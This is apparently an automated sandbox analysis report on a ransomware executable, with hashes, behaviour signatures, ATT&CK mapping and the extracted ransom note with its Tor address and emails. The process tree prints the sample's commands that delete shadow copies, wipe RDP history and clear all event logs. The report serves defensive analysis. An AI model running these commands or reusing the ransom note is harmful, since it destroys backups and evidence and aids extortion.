Overview

overview

10

Static

static

9c73dc281f...6c.exe

windows7_x64

10

9c73dc281f...6c.exe

windows10_x64

10

Analysis

  • max time kernel
    180s
  • max time network
    178s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    28-01-2022 03:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9c73dc281f90a01ff3c8013c297a76319b77f24360de3ee1623a4356126d796c.exe

  • Size

    73KB

  • MD5

    1c021f42e3a138060e1d298726d1579f

  • SHA1

    54e3384fb68fde6fc711491e8072781e3910156a

  • SHA256

    9c73dc281f90a01ff3c8013c297a76319b77f24360de3ee1623a4356126d796c

  • SHA512

    5ee344d17b5e9a2285258b8e16253263ebb856167b36e7679e602c041c2320c10a7182a7cb5c14f59fe3117a981e96fdff6fa7dc2c2194e90a6f659de143c101

Score
10/10
persistenceransomware

Malware Config

Extracted

Path

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\How_to_recovery.txt

Ransom Note
68F56EA7B89D377BC3CFC8B3E865CD03B5FD291B8612BE9FE5923B3CA7445ADE 5B25EE6A5B1485570D4927CFB1F4A46740F419AD4F3DFAC6E3E1E1FC0569EA5E 3CC57B68D428DA3A712280E2EC4B5C606BB354D37EA31C4C95CBCB2978D48AB7 D89ED5DC8FF29441E582EB33B16B9A83C507D80C8802EDC4D9ED7C4E07C4F92A 019A0217C3AB0B0D6BF5B7EAEECD6EA9D9E948F211074B5F8A8B0D7A214FD35C 77BB10F3488AD8775348CA2C7DFE6F00846694576D08CB46B91F2503AFF3A305 BC37F115C70933318E442E0BC6AC6D9D05B5C8B480396939FC06144DC4907F8D 1332B3EFCAF67A2FFC2D7524AB17B25815F6D656F77E29DDB55D0E80EA745277 1D58CAB8146D3FC268252615E7AEC5E4FDA01737184060D0B52ADC30224887B4 9FAE947D64127CCF525E79F8830B8D7B723F8B4C21E48FDA47A1E9623DA2673F 1C50C5B1B9CFB047FE1E24C996F2AC5E31B69CA65B6EC0711492DAC29BBF5D61 E3A9FAA3CEEEB3750C1936FA3014C7B8DCB7F3F48AAC3DD2D113CD9D640D3093 04026203440DE1528114B5EAEB7F78471041528335EAEAA491CF93DE6CA6C15A 9F4215F07340A4251ACC43E527682D88CF37F91852868ED47400D793BBDA49E3 08C051E6E78DF07F07BEA00EDC23C837C1735E1962B7810A6A453C3905672FDD 5CF235459A815D0608211A845F45A498B170CFBEFE1E19415E7F8F131BF23099 109E6661ADF74F4877F057202C6261B24CD55E044A6B5E0DB2C0005C130764C6 105220441E61E5A857E54306024B7DD6AACF83E5D4CB26FB621F283AF0C5E10C F47138A34D730D4690D78AEA4575D7497CB0C28B54DCC6465146650A7933EBCB 0AE9E973C8C1EC57B226B33AFF723AA38FB15CD8CE72993CCD5D874888BEABCA DF4503A01F7803063E0B61DD929445D246A7D5CDD7C33A0F3ECDC191E07AF591 443AADD81C854D55007D1E1409A1C137AE5F578395F11A5582A1058120DBD5AD 5AF711F0268DFE351CA84AE00E06F988FD07FB9197B06FD51469AF551E32F025 E73CD34C1CBCEB083F9CC2D8A317323F8C5AB3CAC472B96BB66E6D8D09248DAB A5124595D545F553656B8AC9889EE252B4ED6D63F42B780D2CED54B1819B2B19 A550950175FC8B00E5 Contact us for price and get decryption software. Note that this server is available via Tor browser only Follow the instructions to open the link: qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site. 2. Press "Download Tor", then press "Download Tor Browser Bundle", install and run it. 3. Now you have Tor browser. In the Tor Browser open qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion 4. Start a chat and follow the further instructions. If you can not use the above link, use the email: ithelp02@decorous.cyou ithelp02@wholeness.business * To contact us, create a new free email account on the site: protonmail.com IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER. ���������������
Emails

ithelp02@decorous.cyou

ithelp02@wholeness.business
URLs

http://qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 11 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops desktop.ini file(s) 38 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9c73dc281f90a01ff3c8013c297a76319b77f24360de3ee1623a4356126d796c.exe
    "C:\Users\Admin\AppData\Local\Temp\9c73dc281f90a01ff3c8013c297a76319b77f24360de3ee1623a4356126d796c.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1580
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:520
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:676
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:216
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:1124
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\9c73dc281f90a01ff3c8013c297a76319b77f24360de3ee1623a4356126d796c.exe > nul
      2⤵
      • Deletes itself
      PID:916
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1736
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1480
  • C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\How_to_recovery.txt
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:1752
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:1932
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x4f4
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1864

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Privilege Escalation

    Defense Evasion

    File Deletion

    2
    T1107

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Inhibit System Recovery

    2
    T1490

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Desktop\How_to_recovery.txt
      MD5

      dc25b9677563088c9f6b8101032b1ff6

      SHA1

      7309a759725bda70392eb77cb22d09b498361d57

      SHA256

      e86df8fff4ff879ed1399842a0357dd7baeb97c77226c7b70f564c259b3dbbf3

      SHA512

      9c31b323bdea16ab6374eb32542ebe0a9de79712e1a9cf08a341fe0dcdf4e4c43c3e12c70c78f94359d091d6b8eea832bd9cb415aae1860a26d969129f8b7da3

      Download Submit
    • memory/1480-55-0x000007FEFB571000-0x000007FEFB573000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1580-54-0x00000000754B1000-0x00000000754B3000-memory.dmp
      Filesize

      8KB

      Download